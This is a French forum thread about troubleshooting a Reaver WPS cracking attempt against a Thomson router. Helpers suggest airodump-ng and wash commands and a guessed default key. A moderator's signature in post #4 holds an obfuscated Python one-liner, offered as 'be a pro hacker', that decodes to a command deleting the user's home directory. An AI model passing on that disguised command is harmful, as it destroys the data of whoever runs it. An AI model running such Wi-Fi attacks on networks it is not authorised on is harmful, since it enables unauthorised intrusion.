Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 16-12-2012 23:19:40

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

une solution please pour ce probleme

j'ai essayé de cracké un WPA-PSK mais j'obtient
reaver -i mon0 -b 08:76:FF:77:F2:80

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

[+] Waiting for beacon from 08:76:FF:77:F2:80
[+] Associated with 08:76:FF:77:F2:80 (ESSID: Thomson77F280)
[+] 0.00% complete @ 2012-12-09 03:35:45 (0 seconds/pin)
[+] 0.00% complete @ 2012-12-09 03:38:18 (0 seconds/pin)
[+] 0.00% complete @ 2012-12-09 03:39:26 (0 seconds/pin)
[+] 0.00% complete @ 2012-12-09 03:40:24 (0 seconds/pin)
[+] 0.00% complete @ 2012-12-09 03:41:46 (0 seconds/pin)
[+] 0.00% complete @ 2012-12-09 03:42:52 (0 seconds/pin)
[+] 0.00% complete @ 2012-12-09 03:43:56 (0 seconds/pin)
[+] 0.00% complete @ 2012-12-09 03:44:59 (0 seconds/pin)
........

Dernière modification par AHAYMH (16-12-2012 23:24:19)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-12-2012 08:30:31

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : une solution please pour ce probleme

AHAYMH a écrit :

(ESSID: Thomson77F280)

Ah les BBkeys ....!:D

Tu as essayé ?

ET ....? une fois c'est un sagem fast 1704, une fois un Thomson .....

Dernière modification par yasmine (17-12-2012 08:46:54)

Hors Ligne

#3 17-12-2012 09:41:03

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : une solution please pour ce probleme

Essayons de faire des titres descriptifs.
"Une solution please pour ce problème"... ce sont 6 mots pour ne rien dire.
tu devrais mettre dans le titre des termes comme, par exemple, reaver, spécifier le modèle du routeur, tu pourrais mentionner que tu es associé mais l'attaque reste à 0 etc...
Pense à utiliser des mots qui permettent de cerner le sujet, des mots qu'un autre utlisateur mettrait dans le moteur de recherche si il avait le même problème que toi.
Quand tu consulte un forum et utilise son  moteur de recherche tu ne vas jamais utiliser "help problème please"
comme mots clefs pour ta recherche.  wink

Ensuite si tu veux que nous puissions t'aider, nous avons besoins de beaucoup plus d'éléments.

- Adjoindre un copié-collé ou une capture d'écran d'un scan en console avec "airodump-ng"; en activant le filtre  bssid et le filtre canal sur l'objectif : ton routeur.  Ceci afin de voir PWR et RXQ, le nombre de stations clients, si tu es bien associés...

-Ajouter un autre copié-collé ou capture d'écran d'un scan WPS avec wash/walsh. Pour vérifier que le wps est effectivement  opératif et qu'il n'y a pas de blocage en cours du WPS.

-Refaire l'attaque mais en ajouttant l'option -vv (verbose) afin d'avoir des détails sur le suivit de l'attaque, là on ne voit absolument rien wink

sudo reaver -i mon0 -b 00:00:00:00:00:01 -vv

Et tu nous fais un copié-collé de ce qui se passe en console.

Hors Ligne

#4 17-12-2012 10:46:16

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : une solution please pour ce probleme

9D667B24CC ?


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 17-12-2012 15:00:24

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

D'accord

kcdtv a écrit :

Essayons de faire des titres descriptifs.
"Une solution please pour ce problème"... ce sont 6 mots pour ne rien dire.
tu devrais mettre dans le titre des termes comme, par exemple, reaver, spécifier le modèle du routeur, tu pourrais mentionner que tu es associé mais l'attaque reste à 0 etc...
Pense à utiliser des mots qui permettent de cerner le sujet, des mots qu'un autre utlisateur mettrait dans le moteur de recherche si il avait le même problème que toi.
Quand tu consulte un forum et utilise son  moteur de recherche tu ne vas jamais utiliser "help problème please"
comme mots clefs pour ta recherche.  wink

Ensuite si tu veux que nous puissions t'aider, nous avons besoins de beaucoup plus d'éléments.

- Adjoindre un copié-collé ou une capture d'écran d'un scan en console avec "airodump-ng"; en activant le filtre  bssid et le filtre canal sur l'objectif : ton routeur.  Ceci afin de voir PWR et RXQ, le nombre de stations clients, si tu es bien associés...

-Ajouter un autre copié-collé ou capture d'écran d'un scan WPS avec wash/walsh. Pour vérifier que le wps est effectivement  opératif et qu'il n'y a pas de blocage en cours du WPS.

-Refaire l'attaque mais en ajouttant l'option -vv (verbose) afin d'avoir des détails sur le suivit de l'attaque, là on ne voit absolument rien wink

sudo reaver -i mon0 -b 00:00:00:00:00:01 -vv

Et tu nous fais un copié-collé de ce qui se passe en console.

Hors Ligne

#6 17-12-2012 20:40:09

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

yy.jpeg
rr.jpeg
tt.jpeg
ee.jpeg
zz.jpeg
aa.jpeg

Hors Ligne

#7 17-12-2012 20:41:29

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

J'utilise Alfa awus036h sur BackTrack 5r3

Hors Ligne

#8 18-12-2012 08:45:23

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : une solution please pour ce probleme

spawn a écrit :

9D667B24CC ?

Tu as essayé cette clé proposé ??

Hors Ligne

#9 18-12-2012 13:09:36

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

ça marche pas ce clé


yasmine a écrit :
spawn a écrit :

9D667B24CC ?

Tu as essayé cette clé proposé ??

Hors Ligne

#10 18-12-2012 19:23:54

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : une solution please pour ce probleme

il  faudrait que tu fixes le bssid dans ta commande airodump-ng,

airodump-ng --bssid 00:11:22:33:44:55  --channel 13 mon0

et il nous faut le résultat de wash

wash -i mon0 -C

Hors Ligne

#11 19-12-2012 13:20:37

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

Voila le
wash -i mon0

2.jpeg

Hors Ligne

#12 19-12-2012 20:22:25

abradacabra
Membre Hyperactif
Inscription : 18-12-2012
Messages : 47

Re : une solution please pour ce probleme

J'ai le même problème que toi surtout le WPS transaction failed ( code 0x02 )

Je ne trouve pas de solution

Dernière modification par abradacabra (19-12-2012 20:25:28)

Hors Ligne

#13 20-12-2012 16:23:58

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : une solution please pour ce probleme

On y est presque, il manque que tu lances airodump-ng avec filtre bssid et fasse une capture d'écran

Hors Ligne

#14 20-12-2012 18:37:28

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

Tu peux m'envoyer la commande stp

kcdtv a écrit :

On y est presque, il manque que tu lances airodump-ng avec filtre bssid et fasse une capture d'écran

Hors Ligne

#15 20-12-2012 23:11:16

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : une solution please pour ce probleme

kcdtv a écrit :

il  faudrait que tu fixes le bssid dans ta commande airodump-ng,

airodump-ng --bssid 00:11:22:33:44:55  --channel 13 mon0

et il nous faut le résultat de wash

wash -i mon0 -C

il faut que tu rajoute "--bssid" et l'adresse mac de ton routeur.

Hors Ligne

#16 22-12-2012 02:50:56

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

Encore le meme probleme sad

kcdtv a écrit :
kcdtv a écrit :

il  faudrait que tu fixes le bssid dans ta commande airodump-ng,

airodump-ng --bssid 00:11:22:33:44:55  --channel 13 mon0

et il nous faut le résultat de wash

wash -i mon0 -C

il faut que tu rajoute "--bssid" et l'adresse mac de ton routeur.

Hors Ligne

#17 30-12-2012 16:39:30

AHAYMH
Banni(e)
Inscription : 08-11-2012
Messages : 22

Re : une solution please pour ce probleme

??????

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]